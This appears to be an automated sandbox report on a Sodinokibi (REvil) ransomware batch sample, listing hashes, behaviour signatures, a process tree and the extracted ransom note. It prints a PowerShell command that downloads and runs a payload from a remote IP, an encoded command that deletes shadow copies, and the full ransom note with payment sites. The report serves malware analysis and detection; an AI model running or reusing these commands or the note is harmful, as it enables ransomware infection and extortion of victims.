Overview

overview

10

Static

static

aa924bdd41...40.bat

windows7_x64

10

aa924bdd41...40.bat

windows10_x64

10

Analysis

  • max time kernel
    34s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    23-05-2020 16:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aa924bdd41c78914cf9c258c5b04d440.bat

  • Size

    217B

  • MD5

    73b18c7ea72367714adfa391d407d44b

  • SHA1

    936cfb5cb7073a9e298eed93720a1e73b88b50b8

  • SHA256

    efb6eff4932c6a31030f3eff665d0228d063c0fc37fb274278e9ceb7e55f2fe8

  • SHA512

    60a9438888dc461e3c90e4df597bbe9420c700f1df7a62ede10b1e44a595336c948b4ec520a4589bc1f2f542d5c6e1b3388f55fead8501b40d843f3dbe3d3c98

Score
10/10
ransomwarepersistencesodinokibi

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440

Extracted

Path

C:\62mfmn-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 62mfmn. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B24DC294A8BCFD9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/5B24DC294A8BCFD9 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: whvAJMjeBrBZ6CW24dL6Mx5qCrAL5QwwoIHmcaptmQGLEkYN5gakTy5GlEDrEDuO SzzWO99NwQwCGfP87xpsDwJvPK5G56MBMYUXDsMb/MDSSUMBgxc/Syex40PNi/Hk gPsPgKS+bsrxo5nzfzuWFBfkcBE00JYCRviTY6AtnJzo5tEH9W9DnORafbd1QeRn 7+xAMSnbsTRMaMXtulfQz3IIaveb5UpbUjnEhssxXOK6+a0m6HZgHGmWScrb6pjX /PRoG1epTli1xKG2fABox5o3a89ghklkewj/ZY7qsGJI57bdEIGZG+0B7ob7syMv SfsN4kG7/pduj343R8TXMJdTxvO5Svlb8K0AGXYgpSLB89Gz73l8YvPKCtwSXx5x 0yJi56DhmkGOFNC/ZWguIEsrfOgh0/vWq81VcQMSDIn1UfonoXheNuodoNmFTfwF eQ1eLAihbB3gikynMaifL2nT4J1kO+sFZjWYSiyZUBFkPCdVfszlXu07Tx4STgHj 5bTuKq6mZrxWB5tviFa/ICKxxPCcbHy5vog/KId3eFJ4ixk0xAXj0ABtLeUWyMkJ mDu58BeFPrx+8bmlKXQbgIrvb383lXparBfKI/n8Rz4QjsXQmr9N4Tcb2Q9OL3pq uhd6Md/utWwS6rEQNGfY4S+r8Ad7ZXtJBCxGT5CsDqG8QjJ+no4c90WzbkqeRcoq DUeqh/IhXtUWD8IkyK0fLBb75s4uZ48GLWX2S4q2fMNm3CAksAGcR9yGGuosYLjT I/FqJDQjcNh/R2TIfODslqtURF7XbHntb8TXd5jLZwRvIupmrt/UJHgv4UO1nzCC jkTbc41vog0VSzSpevbmK6obSdxNnm1xK3vQMRpAJxtbU1IE3SXLrV9/KYR4uq57 +sqQZjajaGj70SoHZp2YLyYhzLmxO54mXSPwm9BA5Aa4+EAOaPK5AloV7Kchs8Ip +Vu8SCOFtrh2r//muGPCsllW2Y3hRyzat1yJ0vbc6JBgGT79WK8i/qLFDtPscfZC NVUteuB4vfgqZmEbIQFz0kXd7eqKQLp7tES6ZTB5duEGIf64ejicZNVEVTYUceYe jDPDm9i1gEwsrnvZ7vlClPQoNm0J7h70OyxG4aDJ0ZKOodaQpWi1R/VPfjyurEnT XZyuKr7JzJXxjXsMQ1P26O5OJT9ED2vUiZroshTu2usQBRz9x75ppfqpu3tZShFL wUZeQxHu3QZX2G3EIuWPHpXBWotzg5Ys/LD1/TF4krj7O4zHSmd6Pf3daXpevhR4 zUtucKw6u/t0fkVOash4210SN/6A3s5Nsu3lMDf48No= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B24DC294A8BCFD9

http://decryptor.cc/5B24DC294A8BCFD9

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Drops file in Program Files directory 30 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Enumerates connected drives 3 TTPs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\aa924bdd41c78914cf9c258c5b04d440.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1052
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440');Invoke-JYKVBWWUMA;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1312
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:784
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1780

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit